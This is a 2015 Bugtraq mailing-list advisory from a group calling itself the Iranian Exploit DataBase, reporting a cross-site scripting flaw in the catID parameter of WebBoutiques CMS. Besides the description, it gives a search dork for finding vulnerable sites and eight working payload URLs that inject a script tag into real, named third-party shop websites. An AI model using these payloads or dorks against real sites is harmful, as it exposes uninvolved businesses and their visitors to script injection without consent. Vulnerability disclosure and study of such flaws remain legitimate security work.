
Date: Mon, 7 Dec 2015 14:14:56 GMT
From: iedb.team@...il.com
To: bugtraq@...urityfocus.com
Subject: WebBoutiques Cms Cross-Site Scripting Vulnerability






#################################

#
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@            @@@  @@@@@@@
#     @@@    @@@@@@@@@@@    @@@  @@         @@@     @@            @@@  @@@@@@@@  
#     @@@    @@@            @@@    @@       @@@       @@          @@@  @@@  @@@  
#     @@@    @@@            @@@      @@     @@@     @@            @@@  @@@  @@@  
#     @@@    @@@@@@@@@@@    @@@       @     @@@@@@@@@@            @@@  @@@@@@
#     @@@    @@@@@@@@@@@    @@@     @@      @@@     @@            @@@  @@@@@@
#     @@@    @@@            @@@   @@        @@@       @@   @@@    @@@  @@@ @@@
#     @@@    @@@            @@@ @@          @@@     @@     @@@    @@@  @@@  @@@
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@     @@@    @@@  @@@   @@@
#

#####################################

#####################################

#         Iranian Exploit DataBase

# WebBoutiques Cms Cross-Site Scripting Vulnerability

# Vendor site : http://www.WebBoutiques.co.uk/

# Dork : "Powered by WebBoutiques.co.uk website design"

# Author : IeDb

# Site : Www.IeDb.Ir   -   xssed.Ir

# Vulnerability attack information site : http://xssed.Ir/

#####################################

Bug :

http://www.site.com/catalogue_main.php?catID=[Xss]

Dem0 :

http://www.lm-france.fr/catalogue_main.php?catID=5767"><script>alert(/IeDb.Ir/)</script>
http://www.funkylittledarlings.co.uk/catalogue_main.php?catID=2043"><script>alert(/IeDb.Ir/)</script>
http://www.lm-france.com/catalogue_main.php?catID=5781"><script>alert(/IeDb.Ir/)</script>
http://www.lightingmatters.co.uk/catalogue_main.php?catID=804"><script>alert(/IeDb.Ir/)</script>
http://www.nitron.co.uk/catalogue_main.php?catID=12567"><script>alert(/IeDb.Ir/)</script>
http://www.1stoptiontraining.com/catalogue_main.php?catID=9868"><script>alert(/IeDb.Ir/)</script>
http://www.smithwhinney.co.uk/catalogue_main.php?catID=1473"><script>alert(/IeDb.Ir/)</script>
http://www.c21video-wb.com/catalogue_main.php?catID=1161"><script>alert(/IeDb.Ir/)</script>

#####################################

#  Archive Exploit = http://iedb.ir/exploits-4280.html

#####################################


